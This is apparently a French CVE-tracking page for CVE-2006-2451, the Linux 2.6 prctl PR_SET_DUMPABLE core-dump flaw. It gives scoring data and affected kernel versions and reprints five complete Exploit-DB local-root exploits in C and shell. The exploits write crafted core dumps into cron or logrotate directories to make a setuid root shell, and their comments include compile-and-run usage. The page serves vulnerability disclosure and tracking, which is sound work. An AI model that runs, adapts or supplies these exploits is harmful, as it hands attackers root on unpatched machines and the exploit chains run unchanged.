CVE-2006-2451

EPSS

12.03%V4

Vecteur

Local

Publié

2006-07-07
16h00 +00:00

Modifié

2018-10-18
12h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-399	Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	4.6		AV:L/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.22%	–	–
2022-02-13	–	–	3.22%	–	–
2022-04-03	–	–	3.22%	–	–
2022-09-18	–	–	3.22%	–	–
2023-03-12	–	–	–	0.04%	–
2023-09-03	–	–	–	0.04%	–
2023-12-03	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	11.29%
2025-03-30	–	–	–	–	12.03%
2025-03-30	–	–	–	–	12.03,%

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Date	Percentile
2022-02-06	65%
2022-02-13	66%
2022-04-03	83%
2022-09-18	84%
2023-03-12	–
2023-09-03	6%
2023-12-03	–
2024-06-02	–
2025-01-19	–
2025-03-18	93%
2025-03-30	93%
2025-03-30	93%

Informations sur l'Exploit

Exploit Database EDB-ID : 2031

Date de publication : 2006-07-17 22h00 +00:00
Auteur : Marco Ivaldi
EDB Vérifié : Yes

/* * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via * the PR_SET_DUMPABLE argument of the prctl function and a program that causes * a core dump file to be created in a directory for which the user does not * have permissions (CVE-2006-2451). * * This exploit uses the logrotate attack vector: of course, you must be able * to chdir() into the /etc/logrotate.d directory in order to exploit the * vulnerability. I've experimented a bit with other attack vectors as well, * with no luck: at (/var/spool/atjobs/) uses file name information to * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). * * Thanks to Solar Designer for the interesting discussion on attack vectors. * * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! * * Usage: * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall * [exploit must be statically linked] * $ ./raptor_prctl2 * [please wait until logrotate is run] * $ ls -l /tmp/pwned * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned * $ /tmp/pwned * sh-3.00# id * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) * sh-3.00# * [don't forget to delete /tmp/pwned!] * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/stat.h> #include <sys/resource.h> #include <sys/prctl.h> #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" char payload[] = /* commands to be executed by privileged logrotate */ "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's create a fake logfile in /var/log */ if (!(pid = fork())) { chdir("/var/log"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/logrotate.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if ((stat("/var/log/core", &st) < 0) || (stat("/etc/logrotate.d/core", &st) < 0)) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } /* total pwnage */ fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); exit(0); } // milw0rm.com [2006-07-18]

Exploit Database EDB-ID : 2004

Date de publication : 2006-07-10 22h00 +00:00
Auteur : dreyer & RoMaNSoFt
EDB Vérifié : Yes

/*****************************************************/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer <luna@aditel.org> (main PoC code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); } // milw0rm.com [2006-07-11]

Exploit Database EDB-ID : 2005

Date de publication : 2006-07-11 22h00 +00:00
Auteur : Julien Tinnes
EDB Vérifié : Yes

/* Linux >= 2.6.13 prctl kernel exploit * * (C) Julien TINNES * * If you read the Changelog from 2.6.13 you've probably seen: * [PATCH] setuid core dump * * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, * user setable argument to PR_SET_DUMPABLE. * * This flaw allows us to create a root owned coredump into any directory. * This is trivially exploitable. * */ #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/prctl.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <signal.h> #include <stdlib.h> #include <time.h> #define CROND "/etc/cron.d" #define BUFSIZE 2048 struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; char crontemplate[]= "#/etc/cron.d/core suid_dumpable exploit\n" "SHELL=/bin/sh\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; char cronstring[BUFSIZE]; char fname[BUFSIZE]; struct timeval te; void sh(int sn) { execl(fname, fname, (char *) NULL); } int main(int argc, char *argv[]) { int nw, pid; if (geteuid() == 0) { printf("[+] getting root shell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } } printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); /* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("This is not fatal, rewrite the exploit\n"); } if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Installed signal handler\n"); /* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; } /* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Is you kernel version >= 2.6.13 ?\n"); return 1; } printf("[+] We are suidsafe dumpable!\n"); /* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] Malicious string forged\n"); if ((pid=fork()) == -1) { perror("[-] fork"); return 1; } if (pid == 0) { /* This is not the good way to do it ;) */ sleep(120); exit(0); } /* SEGFAULT the child */ printf("[+] Segfaulting child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120); printf("[-] It looks like the exploit failed\n"); return 1; } // milw0rm.com [2006-07-12]

Exploit Database EDB-ID : 2006

Date de publication : 2006-07-12 22h00 +00:00
Auteur : Marco Ivaldi
EDB Vérifié : Yes

/* * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * via the PR_SET_DUMPABLE argument of the prctl function and a program that * causes a core dump file to be created in a directory for which the user does * not have permissions (CVE-2006-2451). * * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * means that distributions that use a different configuration (namely Dillon's * crontab on Slackware Linux) can be vulnerable but not directly exploitable. * * Usage: * $ gcc raptor_prctl.c -o raptor_prctl -Wall * [exploit must be dinamically linked] * $ ./raptor_prctl * [...] * sh-3.00# * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/stat.h> #include <sys/resource.h> #include <sys/prctl.h> #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" char payload[] = /* commands to be executed by privileged crond */ "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid, i; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if (stat("/etc/cron.d/core", &st) < 0) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Please wait a couple of minutes;)\n"); /* wait for crond to execute our evil entry */ for (i = 0; i < 124; i += 2) { if (stat("/tmp/pwned", &st) < 0) { fprintf(stderr, "\nError: Check /tmp/pwned!\n"); exit(1); } if (st.st_uid == 0) break; fprintf(stderr, "."); sleep(2); } /* timeout reached? */ if (i > 120) { fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); exit(1); } /* total pwnage */ fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); system("/tmp/pwned"); exit(0); } // milw0rm.com [2006-07-13]

Exploit Database EDB-ID : 2011

Date de publication : 2006-07-13 22h00 +00:00
Auteur : Sunay
EDB Vérifié : Yes

#!/bin/sh # # PRCTL local root exp By: Sunix # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # tested on Intel(R) Xeon(TM) CPU 3.20GHz # kernel 2.6.9-22.ELsmp # maybe others ... # Tx to drayer & RoMaNSoFt for their clear code... # # zmia23@yahoo.com cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); system("/bin/sh"); system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/*"); return 0; } __EOF__ echo "wait aprox 4 min to get sh" cd /tmp cc -o s s.c cc -o getsuid getsuid.c ./getsuid ./s rm -rf getsuid* rm -rf s.c rm -rf prctl.sh # milw0rm.com [2006-07-14]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.5

Linux>>Linux_kernel >> Version 2.6.13.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.6

Linux>>Linux_kernel >> Version 2.6.14.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.7

Linux>>Linux_kernel >> Version 2.6.14.7 (Open CPE detail)